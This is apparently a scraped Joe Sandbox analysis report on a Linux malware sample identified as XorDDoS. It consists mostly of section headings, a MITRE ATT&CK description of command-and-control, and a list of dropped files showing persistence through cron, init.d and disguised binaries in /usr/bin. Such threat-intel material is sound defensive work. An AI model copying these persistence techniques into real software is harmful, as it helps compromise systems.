Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report eTASxT3bjO.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Threatname: XorDDoS

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/cron.hourly/gcc.sh

/etc/crontab

/etc/init.d/eTASxT3bjO.elf

/memfd:snapd-env-generator (deleted)

/run/gcc.pid

/usr/bin/eoogzzilvp

/usr/bin/evbjclrakz

/usr/bin/exnwncfijy

/usr/bin/ghgagimgub

/usr/bin/kffnhivjdw

/usr/bin/mqnpjwpasf

/usr/bin/svkksitypo

/usr/bin/uruvhkrplh

/usr/bin/vijnytmbcx

/usr/bin/wvicexcnqi

/usr/bin/xaxopmwzau

/usr/bin/xjdcsmwtwe

/usr/bin/yfaogzsdtv

/usr/bin/ygqhgbaeei

/usr/bin/zqylkjndwx

/usr/lib/libudev.so

Static File Info

General

Static ELF Info

ELF header

Linux Analysis Report
eTASxT3bjO.elf